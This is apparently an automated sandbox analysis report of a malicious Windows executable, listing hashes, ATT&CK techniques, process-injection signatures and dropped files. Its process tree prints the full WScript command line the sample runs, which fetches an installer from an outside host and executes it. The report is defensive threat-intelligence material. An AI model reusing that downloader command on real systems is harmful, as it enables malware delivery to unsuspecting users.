ed81443668cdfb7900fb2811c8957255eb6fc2e1b457977b319facffddf73359

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
22-05-2024 02:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe
Size

184KB
MD5

65bffeb4b8e51e6ebbed060f0658adee
SHA1

0534346ad00e8c0930ea111d4be4bf05e70c48be
SHA256

ed81443668cdfb7900fb2811c8957255eb6fc2e1b457977b319facffddf73359
SHA512

f9939995c9af61d541cb04ba40c9016b89d23839e19b299a50e1c866e2e5e2a9163076fc901bfd591792bfb61c06650b699baf815b6c4247d5104ad953bb54b5
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3w:/7BSH8zUB+nGESaaRvoB7FJNndnJ

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
6	2056	WScript.exe
8	2056	WScript.exe
10	2056	WScript.exe
12	2408	WScript.exe
13	2408	WScript.exe
16	2648	WScript.exe
17	2648	WScript.exe
20	304	WScript.exe
21	304	WScript.exe
23	2968	WScript.exe
24	2968	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe

description	pid	process	target process
PID 1008 wrote to memory of 2056	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2056	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2056	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2056	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2408	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2408	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2408	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2408	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2648	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2648	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2648	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2648	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 304	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 304	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 304	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 304	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2968	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2968	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2968	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe
PID 1008 wrote to memory of 2968	1008	65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\65bffeb4b8e51e6ebbed060f0658adee_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1008
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5AC.js" http://www.djapp.info/?domain=TearQAxZLQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf5AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:2056
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5AC.js" http://www.djapp.info/?domain=TearQAxZLQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf5AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:2408
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5AC.js" http://www.djapp.info/?domain=TearQAxZLQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf5AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:2648
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5AC.js" http://www.djapp.info/?domain=TearQAxZLQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf5AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:304
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf5AC.js" http://www.djapp.info/?domain=TearQAxZLQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf5AC.exe
  2⤵
  - Blocklisted process makes network request
  PID:2968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
cb35bd9d6c5a4fd50a9263018bbd9784

SHA1
efec24f93d2af7bd01969c36870ebc928fa6c790

SHA256
be648ee93df285417e494e28c01e3ab8f3d043845f4d3b397dfd137d187ed612

SHA512
ac26182fb167458da4b465b118720470859e8028db8d3d71ddbe0c5be0e46b9178c5f7ccb8b1252c38754e27da1af546f8d2f6e32e1bfcbeac0d510aa831bf11

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
7e8e49ec72ec58e906ebb24444cb85c6

SHA1
d1c4f1d23e4b9ce81610e94841e3c9235c1fe311

SHA256
8c593216f24caf47fe6b892636c36bb8e0c4d88778bf27c8292039b29505afcc

SHA512
698331d85aab3953565576ee65771a3a6533ad8dd1c8867cc7237ba64977868b98306a2fc678db38206fdab027cf26069983a4e8aaafca9296f4a8347e6cbd57

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
dbb7d0d3ccdc4f2dfeeb1cca0d36fb41

SHA1
5f6a8df2c80655622a34ec430fa17762d59e9d50

SHA256
eb22f5cfa36eee61fa8900fd3f26cfaf32e706174a34c0a6407cdff1a3c291d4

SHA512
5d6502b205763ef245ec2c139dfcb72fe2aadb829896c858db76a4ece2c21dfc80de6eb58e15acead57d0e21aec13771ff20c3c2b8e59e5b981bdfef06de4b00

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
c7d90ab9c0edd7c0de2fb01381253765

SHA1
a642be28c110c835013bdccf646180624d937ced

SHA256
00273c487f816df27af228a6a3c16f203eb212812bfe58ed12371e129120babc

SHA512
53f497b5d8ffb2f167752376b58d52d2513903984dde4e3126db088592fb6b3630b7a3282e57d7a69623f045753288abc39166fad6dcb0f67b3544457c27a3fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
40KB

MD5
c57069835884a7c427f3f0b02a625506

SHA1
6db121f508563831f03b833143b395b8af0f34d0

SHA256
1a95054bac7b700ded428c61508dbb1da01a69f3d853d9005184009788297ea8

SHA512
43325d2293f3f36077795140f5e01aa9d89338dfdb8310771adfde7c1e49339e88b24020fe9fc953073542539b63acb09a7b6bca306aa4a7ecd72719079450b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
40KB

MD5
58866fd19cdfb3953055aec8e97bb4af

SHA1
621e538d23d91ce2e89f81618342b1942714b195

SHA256
eec837e366c71920b91c5bbecb413217db6e9e833a3e19b0771e30a332d061c7

SHA512
c75f9214d73483be0ee3f253d7da75e5c310b6d25daaaa3750d082c09937f72c9bde832407a209dec675d00b39c0b06f056f3471685e5ddad747d7d5dd9a190d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
40KB

MD5
1ce0e7d1d71c1b693ad1f3215658a5be

SHA1
4fbe08b3bc00a9271c7bec52b97706d3d3098d33

SHA256
565adee19be34121c5840f11d9991930c835903b9c170637caab164349f737e1

SHA512
05abae1ff3a8a19edd0f0fff0f0f44b6dc306cc73add5d0c49d102e722804f9be472e3e463800d965f670c3c12a8bac547201887c9c8a6624d2ea2bd9f36d9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
40KB

MD5
f9e4e0251c6da54ba00d444c1ca24102

SHA1
d37dda30add329d665e6522c1add0be83abd338c

SHA256
c534e891d47cdf1ebef3471f767980035920674e42fb9fb7167031f6bc8af40b

SHA512
3eef93e5687e683980791f68335474d4c755464e2ba39413fbd274737d0ae8ca42da3906074ef6c64d9653538f2982037563b0631382599ee7030530b2bc6397

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
40KB

MD5
635a751c8ad03d433b45214c02babefe

SHA1
4a4ef8a19230aec783a4c9163c0c984b3d161b95

SHA256
99b5cab12b69e7a3892720812bf9a129ea8ef59c16fbf590c7931187ae3b0288

SHA512
9a8b1a7c25a78a6e88cc699746dd1a2d8d182440c08d265fad97ba27425e75c84b627d6c6b9541fcb32206eda7e88693f1c71823b81a5e4cee3b2ca543413e27

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab34E6.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4D47.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf5AC.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\3Q66CX95.txt

Filesize
175B

MD5
b2cc42f4464df4832cb73b5f2a4fec92

SHA1
f13322c39d55f5505e546a27f1b53543dc5ed79f

SHA256
418b11c5c4cd484fe2b360472ba38a171612fe325b9c6c180950a3a61f12ea16

SHA512
53bcd0165dfb837ec4d3955f794ccb34fb7824b26cafbc00ee269d4532000385e79a0c61ea46964b57377ede057f82986d6dbe052a968feefac03160af507e95

Download Submit